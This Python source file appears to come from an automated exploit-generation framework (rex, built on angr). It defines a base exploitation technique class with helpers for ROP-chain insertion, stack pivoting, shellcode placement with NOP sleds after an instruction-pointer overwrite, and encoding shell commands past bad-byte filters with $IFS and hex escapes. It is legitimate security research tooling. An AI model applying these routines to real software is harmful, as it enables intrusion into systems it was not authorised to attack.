import os
import re
import angr
import logging
from abc import abstractmethod

from angrop.errors import RopException
from ..exploit import CannotExploit


l = logging.getLogger("rex.exploit.technique")
# Uncomment the following line to print out in the log the reasons why each technique fails their checks
# l.setLevel(logging.INFO)


class Technique:
    """
    Represents an exploitation technique.
    """

    name = None
    applicable_to = [ ]
    bitmask_threshold = 20

    def __init__(self, crash: 'rex.Crash', rop, shellcode: 'rex.exploit.ShellcodeFactory'):
        """
        :param crash: a crash object representing the state at crash time
        :param rop: an angr rop object for finding and requesting chains
        :param shellcode: a shellcode manager to query for shellcode
        """

        self.crash = crash.copy()
        self.rop = rop
        self.libc_rop = crash.libc_rop
        self.shellcode = shellcode

    @abstractmethod
    def check(self):
        """
        Performs checks to determine whether this technique can be applied on the target binary with the given crash.
        Returning False will prevent the attempt of applying this technique.

        :return:    True if this technique may work, False otherwise.
        :rtype:     bool
        """
        return True

    def check_fail_reason(self, reason):
        """
        Log why the check fails.

        :param str reason:  A reason for why the check fails.
        :return:            None
        """

        l.info("[-] %s: %s", self.name, reason)

    @abstractmethod
    def apply(self, **kwargs):
        """
        Applies the exploit technique to the crashing state, returns a working Exploit object
        or raises a CannotExploit exception

        :return: an Exploit object
        """

        raise NotImplementedError

    @property
    def _is_stack_executable(self):
        return self.crash.project.loader.main_object.execstack

    #
    # Exploit helpers
    #

    def reduce_claimed_bitmask(self, bitmask, bitcnt):
        """
        The idea here is there could be constraints such as no "\n" or no null bytes
        So we will try to claim control of a max of 7/8 bits in the bitmask
        :param bitmask: the controlled bitmask
        :param bitcnt: the controlled bitcnt
        :return: the new bitmask
        """

        out_mask = 0

        for byte_index in range(4):
            byte = (bitmask >> 8*byte_index) & 0xff
            # if the byte has all bits set and we have extra bits, unset one bit
            if byte == 0xff and bitcnt > self.bitmask_threshold:
                bitcnt -= 1
                byte = 0x7f
            out_mask |= (byte << 8*byte_index)

        return out_mask

    @staticmethod
    def check_bitmask(state, ast, bitmask):
        # a quick check with some bit patterns to verify control
        size = ast.size()
        test_val_0 = 0x0
        test_val_1 = (1 << size) - 1
        test_val_2 = int("1010"*16, 2) % (1 << size)
        test_val_3 = int("0101"*16, 2) % (1 << size)
        # chars need to be able to be different
        test_val_4 = int(("1001"*2 + "1010"*2 + "1011"*2 + "1100"*2 + "1101"*2 + "1110"*2 + "1110"*2 + "0001"*2), 2) \
            % (1 << size)
        if not state.solver.satisfiable(extra_constraints=(ast & bitmask == test_val_0 & bitmask,)):
            return False
        if not state.solver.satisfiable(extra_constraints=(ast & bitmask == test_val_1 & bitmask,)):
            return False
        if not state.solver.satisfiable(extra_constraints=(ast & bitmask == test_val_2 & bitmask,)):
            return False
        if not state.solver.satisfiable(extra_constraints=(ast & bitmask == test_val_3 & bitmask,)):
            return False
        if not state.solver.satisfiable(extra_constraints=(ast & bitmask == test_val_4 & bitmask,)):
            return False
        return True

    def get_bitmask_for_var(self, state, var):

        # filter vars with only one value
        if len(state.solver.eval_upto(var, 2)) == 1:
            return 0, 0

        # test each bit of the var
        unconstrained_bitmask = 0
        unconstrained_bitcnt = 0
        for bit in range(var.size()):
            l.debug("testing symbolic control of bit %d in var %s", bit, var)
            if len(state.solver.eval_upto(var & 1 << bit, 2)) == 2:
                unconstrained_bitcnt += 1
                unconstrained_bitmask |= (1 << bit)
        l.debug("unconstrained bitmask %#x", unconstrained_bitmask)

        # reduce the number of claimed bits
        unconstrained_bitmask = self.reduce_claimed_bitmask(unconstrained_bitmask, unconstrained_bitcnt)
        unconstrained_bitcnt = bin(unconstrained_bitmask).count("1")

        if not self.check_bitmask(state, var, unconstrained_bitmask):
            raise CannotExploit("computed bitmask does not appear to be valid")

        l.debug("reduced bitmask %#x", unconstrained_bitmask)
        return unconstrained_bitmask, unconstrained_bitcnt

    def _write_some_data(self, data, control, alignment=1, good_addr=None):
        # try all variations of commands at every controlled
        def align_up(v, align):
            return (v + align - 1) - (v + align - 1) % align
        step = len(data)
        step = step - (step % alignment)
        if good_addr is None:
            good_addr = lambda addr: True
        for base in control:
            for addr in range(align_up(base, alignment), base+control[base] - len(data) + 1, step):
                if not good_addr(addr):
                    continue
                constraint = self.crash.state.memory.load(addr, len(data)) == data
                if self.crash.state.solver.satisfiable(extra_constraints=(constraint,)):
                    yield addr, constraint

    def _write_global_data(self, data, **kwargs):
        '''
        write @data into globally addressable memory
        :return: tuple of the address of the string and the constraint which adds the string
        '''
        yield from self._write_some_data(data, self.crash.memory_control(), **kwargs)
        if self.libc_rop is not None:
            yield from self._write_some_data(data, self.crash.libc_memory_control(), **kwargs)

    def _write_executable_global_data(self, data, **kwargs):
        def good_addr(addr):
            return self.crash.state.project.loader.find_segment_containing(addr).is_executable
        return self._write_global_data(data, good_addr=good_addr, **kwargs)

    def _write_with_ROP(self, data):
        """
        write @data into globally addressable memory using ROP
        :return: tuple of the address of the string and the constraint which adds the string
        """
        if self.rop is None:
            return None, None

        addr = self._find_global_address_for_string(data)
        try:
            chain = self.crash.rop.write_to_mem(addr, data)
        except RopException:
            return None, None

        chain, chain_addr = self._ip_overwrite_with_chain(chain)

        # constrain the address to be the chain
        chain_mem = self.crash.state.memory.load(chain_addr, len(chain.payload_str()))
        chain_bvv = self.crash.state.solver.BVV(chain.payload_str())
        # the chain should be guaranteed to be satisfiable here
        self.crash.state.add_constraints(chain_mem == chain_bvv)

        # TODO make sure we can still read an unconstrained successor
        # windup the state to introduce the new bytes and fix up the state for insert other chains
        self._windup_to_unconstrained_successor()

        glob_data = self.crash.state.memory.load(addr, len(data))
        data_bvv  = self.crash.state.solver.BVV(data)
        return addr, (glob_data == data_bvv)

    def _find_global_address_for_string(self, data):
        return self.crash.project.loader.main_object.max_addr - len(data)

    def _read_in_global_data(self, data):
        '''
        call a read with with rop into globally addressable memory
        '''

        if self.rop is None:
            return None, None

        # turn off file size limit
        self.crash.state.posix.stdin.has_end = False

        # first try doing it with a call to read
        addr, cons = self._read_in_global_data_with_read(data)
        if not addr is None:
            return addr, cons

        # next try it with a call to gets
        addr, cons = self._read_in_global_data_with_gets(data)
        if not addr is None:
            return addr, cons

        return None, None

    def _read_in_global_data_with_read(self, data):
        '''
        use the linked function read to read in more global data
        :return: tuple of the address and constraints to add
        '''

        addr = self._find_func_address("read")
        # failed to find address
        if addr is None:
            return None, None

        # sanity check this address
        read_to = self._find_global_address_for_string(data)

        # TODO add an option for preferred file descriptor here
        try:
            chain = self.rop.func_call(addr, [0, read_to, len(data)])
        except RopException:
            return None, None

        # check if the chain can exist
        chain, chain_addr = self._ip_overwrite_with_chain(chain)

        # constrain the address to be the chain
        chain_mem = self.crash.state.memory.load(chain_addr, len(chain.payload_str()))
        chain_bvv = self.crash.state.solver.BVV(chain.payload_str())
        # the chain should be guaranteed to be satisfiable here
        self.crash.state.add_constraints(chain_mem == chain_bvv)

        # TODO make sure we can still read an unconstrained successor
        # windup the state to introduce the new bytes and fix up the state for insert other chains
        self._windup_to_unconstrained_successor()

        glob_data = self.crash.state.memory.load(read_to, len(data))
        data_bvv  = self.crash.state.solver.BVV(data)
        return read_to, (glob_data == data_bvv)

    def _read_in_global_data_with_gets(self, data):
        '''
        use the linked function gets to read in more global data
        :return: tuple of the address and constraints to add
        '''

        addr = self._find_func_address("gets")
        # failed to find address
        if addr is None:
            return None, None

        # sanity check this address
        read_to = self._find_global_address_for_string(data)

        # TODO add an option for preferred file descriptor here
        try:
            chain = self.rop.func_call(addr, [read_to])
        except RopException:
            return None, None

        # check if the chain can exist
        chain, chain_addr = self._ip_overwrite_with_chain(chain)

        # constrain the address to be the chain
        chain_mem = self.crash.state.memory.load(chain_addr, len(chain.payload_str()))
        chain_bvv = self.crash.state.solver.BVV(chain.payload_str())
        # the chain should be guaranteed to be satisfiable here
        self.crash.state.add_constraints(chain_mem == chain_bvv)

        # TODO make sure we can still read an unconstrained successor
        # windup the state to introduce the new bytes and fix up the state for insert other chains
        self._windup_to_unconstrained_successor()

        glob_data = self.crash.state.memory.load(read_to, len(data))
        data_bvv  = self.crash.state.solver.BVV(data)
        return read_to, (glob_data == data_bvv)

    def _find_func_address(self, symbol):
        '''
        find the address of a function given it's name @symbol
        :param symbol: function name to lookup
        :return: the function's address or None if the function is not present
        '''

        address = None
        symobj = self.crash.project.loader.main_object.get_symbol(symbol)
        if symbol in self.crash.project.loader.main_object.plt:
            address = self.crash.project.loader.main_object.plt[symbol]
        elif symobj is not None:
            address = symobj.rebased_addr

        return address

    def _find_libc_func_address(self, symbol):
        symobj = self.libc_rop.project.loader.main_object.get_symbol(symbol)
        return symobj.rebased_addr if symobj else None

    def _windup_to_unconstrained_successor(self, state=None):
        '''
        windup of the state of the crash to the first unconstrained successor
        '''

        if state is None:
            state = self.crash.state

        successors = self.crash.project.factory.successors(state)
        if len(successors.unconstrained_successors) == 0:
            return self._windup_to_unconstrained_successor(successors.flat_successors[0])

        # extend the prev actions path the actions encountered
        self.crash.added_actions.extend(successors.unconstrained_successors[0].history.recent_actions)
        self.crash.state = successors.unconstrained_successors[0]
        return self.crash.state

    def _at_syscall(self, path):

        return self.crash.project.factory.block(path.addr,
                num_inst=1).vex.jumpkind.startswith("Ijk_Sys")

    def _windup_to_syscall(self, state):
        '''
        windup state to a state just about to make a syscall
        '''

        if self._at_syscall(state):
            return state

        successors = self.crash.project.factory.successors(state)
        if len(successors.flat_successors) > 0:
            return self._windup_to_syscall(successors.flat_successors[0])

        raise CannotExploit("unable to reach syscall instruction")

    def _ip_overwrite_call_shellcode(self, shellcode, variables=None):
        '''
        exploit an ip overwrite with shellcode. This is HIGHLY CGC-specific.

        :param shellcode: shellcode to call
        :param variables: variables to check unconstrainedness of
        :return: tuple of the address to jump to, and address of requested shellcode in memory
        '''

        # TODO inspect register state and see if any registers are pointing to symbolic memory
        # if any registers are pointing to symbolic memory look for gadgets to call or jmp there

        if variables is None:
            variables = [ ]

        # accumulate valid memory, this depends on the os and memory permissions
        valid_memory = { }

        # TODO: expand this into some more concrete notion of what addresses we understand
        if not self.crash.aslr:
            for mem in self.crash.symbolic_mem:
                # ask if the mem is executable
                prots = self.crash.state.memory.permissions(mem)
                if self.crash.state.solver.eval(prots) & 4: # PROT_EXEC is 4
                    valid_memory[mem] = self.crash.symbolic_mem[mem]

        # XXX linux special case, bss is executable if the stack is executable
        if self.crash.project.loader.main_object.execstack and self.crash.is_linux:
            valid_memory.update(self.crash.memory_control())

        # hack! max address hueristic for CGC
        for mem, _ in sorted(valid_memory.items(),
                key=lambda x: (0xffffffff - x[0]) + x[1], reverse=True):
            for mem_start in range(mem+valid_memory[mem]-(len(shellcode)//8), mem, -1):

                # default jump addr is the shellcode
                jump_addr = mem_start

                shc_constraints = [self.crash.state.regs.ip == mem_start]

                sym_mem = self.crash.state.memory.load(mem_start, len(shellcode)//8)
                shc_constraints.append(sym_mem == shellcode)

                # hack! TODO: make this stronger/more flexible
                # ...what? what does this mean? why are you doing this???
                for v in variables:
                    shc_constraints.append(v == 0x41414141)

                if self.crash.state.satisfiable(extra_constraints=shc_constraints):

                    # room for a nop sled?
                    length = mem_start - mem
                    if length > 0:

                        # try to add a nop sled, we could be more thorough, but it takes too
                        # much time
                        new_nop_constraints = [ ]

                        sym_nop_mem = self.crash.state.memory.load(mem, length)
                        nop_sld_bvv = self.crash.state.solver.BVV(b"\x90" * length)
                        nop_const = sym_nop_mem == nop_sld_bvv

                        # can the nop sled exist?
                        new_nop_constraints.append(nop_const)
                        # can the shellcode still exist?
                        new_nop_constraints.append(sym_mem == shellcode)
                        # can ip point to the nop sled?
                        new_nop_constraints.append(self.crash.state.regs.ip == mem)

                        if self.crash.state.satisfiable(extra_constraints=new_nop_constraints):
                            jump_addr = mem

                    return jump_addr, mem_start

        raise CannotExploit("no place to fit shellcode")

    def _ip_overwrite_with_chain(self, chain, state=None, assert_next_ip_controlled=False, rop=None):
        """
        exploit an ip overwrite using rop
        :param chain: rop chain to use
        :param state: an optionally state to work off of
        :param assert_next_ip_controlled: if set we use heuristics to ensure control of the next ip
        :return: a tuple containing a new constrained chain and the address to place the chain
        """
        if rop is None:
            rop = self.rop

        if state is None:
            state = self.crash.state

        sp = state.solver.eval(state.regs._sp)

        # first let's see what kind of stack control we have
        symbolic_stack = self.crash.stack_control()
        if len(symbolic_stack) == 0:
            l.warning("no controlled data beneath stack, need to resort to shellcode")
            raise CannotExploit("no controlled data beneath sp")

        chain_addr = None
        stack_pivot = None
        # loop until we can find a chain which gets us to our setter gadget
        for addr in symbolic_stack:
            # increase payload length by wordsize for the final ip hijack
            chain_req = chain.payload_len + self.crash.project.arch.bytes

            # is the space too small?
            if not symbolic_stack[addr] >= chain_req:
                continue

            # if we can directly pivot to the symbolic region, do it
            # the assumption is the first value in the chain is a code address
            # it sounds like a reasonable assumption to me. But I can be wrong.
            chain_constraints = [state.regs.sp == addr, state.regs.pc == chain._values[0][0]]
            if state.solver.satisfiable(extra_constraints=chain_constraints):
                chain_addr = addr
                chain_cp = chain.copy()
                chain_cp._values = chain_cp._values[1:]
                chain_cp.payload_len -= self.crash.project.arch.bytes
                # extra checks for ip control
                if assert_next_ip_controlled:
                    ip_bv = state.memory.load(chain_addr + chain.payload_len, self.crash.project.arch.bytes)
                    if not state.satisfiable(extra_constraints=chain_constraints + [ip_bv == 0x41414141]):
                        continue
                    if not state.satisfiable(extra_constraints=chain_constraints + [ip_bv == 0x56565656]):
                        continue

                for expr in chain_constraints:
                    state.solver.add(expr)
                return chain_cp, addr

            # okay we have a symbolic region which fits and is below sp
            # can we pivot there?
            for gadget in rop.gadgets:
                # let's make sure the gadget is sane

                # TODO: consult state before throwing out a gadget, some of these memory
                # accesses might be acceptable
                if len(gadget.mem_changes + gadget.mem_writes + gadget.mem_reads) > 0:
                    continue

                if gadget.bp_moves_to_sp:
                    # it'd better not touch sp
                    continue

                # FIXME: this assumption is very wrong
                # if we assume all gadgets end in a 'ret' we can subtract 4 from the stack_change
                # as we're not interested in the ret's effect on stack movement, because when the
                # ret executes we'll have chain control
                jumps_to = sp + (gadget.stack_change - self.crash.project.arch.bytes)
                # does it hit the controlled region?
                if addr <= jumps_to < addr + symbolic_stack[addr]:
                    # it lands in a controlled region, but does our chain fit?
                    offered_size = symbolic_stack[addr] - (jumps_to - addr)
                    if offered_size >= chain_req:
                        # we're in!
                        chain_addr = jumps_to
                        stack_pivot = gadget

                        scratch = state.copy()
                        chain_cp = chain.copy()

                        # test to see if things are still satisfiable
                        chain_constraints = [ ]

                        chain_constraints.append(state.regs.ip == stack_pivot.addr)

                        # TODO: update rop to make this possible without refering to internal vars
                        # we constrain our rop chain to being equal to our payload, preventing the chain builder
                        # from putting illegal characters into positions we don't care about
                        for cons in chain_cp._blank_state.solver.constraints:
                            scratch.add_constraints(cons)

                        chain_bytes = chain_cp.payload_bv()
                        payload_bytes = scratch.memory.load(chain_addr, chain.payload_len)

                        scratch.add_constraints(chain_bytes == payload_bytes)

                        chain_cp._blank_state = scratch

                        mem = state.memory.load(chain_addr, chain_cp.payload_len)

                        try:
                            cbvv = state.solver.BVV(chain_cp.payload_str())
                        except angr.SimUnsatError:
                            # it's completely possibly that the values we need need in the chain can't exist due to
                            # constraints on memory, for example if we need the value '1' to exist in our chain, when
                            # our chain enter the process memory space with a 'strcpy', '1' cannot exist because its
                            # value will contain null bytes
                            continue # the chain itself cannot exist here

                        chain_constraints.append(mem == cbvv)

                        # if the chain can't be placed here, let's try again
                        if not state.satisfiable(extra_constraints=chain_constraints):
                            continue

                        # extra checks for ip control
                        if assert_next_ip_controlled:
                            ip_bv = scratch.memory.load(chain_addr + chain.payload_len, self.crash.project.arch.bytes)
                            if not state.satisfiable(extra_constraints=chain_constraints + [ip_bv == 0x41414141]):
                                continue
                            if not state.satisfiable(extra_constraints=chain_constraints + [ip_bv == 0x56565656]):
                                continue

                        # constrain eip to equal the stack_pivot
                        state.add_constraints(state.regs.ip == stack_pivot.addr)
                        return chain_cp, chain_addr

        raise CannotExploit("[general_technique] unable to insert chain")

    def _get_libc_obj(self):

        # grab the memory mapping
        mapping = self.crash.tracer.angr_project_bow._mem_mapping

        # make sure there is only one libc
        lib_names = [ x for x in mapping.keys() if re.match(r"^(libuC)?libc(\.|-)", os.path.basename(x)) ]
        if not len(lib_names):
            return None
        if len(lib_names) > 1:
            l.warning("more than 1 potential libc detected: %s", lib_names)

        # return libc object if it exists in angr
        libc_addr = mapping[lib_names[0]]
        return self.crash.project.loader.find_object_containing(libc_addr)

    def _get_libc_func_addr(self, func_name):

        libc_obj = self._get_libc_obj()
        if not hasattr(libc_obj, 'symbols_by_name'):
            return None
        if func_name in libc_obj.symbols_by_name:
            return libc_obj.symbols_by_name[func_name].rebased_addr
        return None

    def _encode_cmd(self, cmd_str):
        # command ending
        if ord(b';') not in self.crash._bad_bytes:
            cmd_str += b';'
        elif ord(b'\n') not in self.crash._bad_bytes:
            cmd_str += b'\n'
        elif ord(b'\x00') not in self.crash._bad_bytes:
            cmd_str += b'\x00'
        elif ord(b'&') not in self.crash._bad_bytes:
            cmd_str += b'&&1'
        elif ord(b'|') not in self.crash._bad_bytes:
            cmd_str += b'||1'

        if ord(b' ') in self.crash._bad_bytes:
            cmd_str = cmd_str.replace(b' ', b'$IFS')

        # check shell coding
        if any(x in self.crash._bad_bytes for x in b'$\\x\''):
            return cmd_str
        new_cmd_str = b''
        for c in cmd_str:
            if c not in self.crash._bad_bytes:
                new_cmd_str += bytes([c])
                continue
            new_cmd_str += b"$'\\x%02x'" % c
        return new_cmd_str
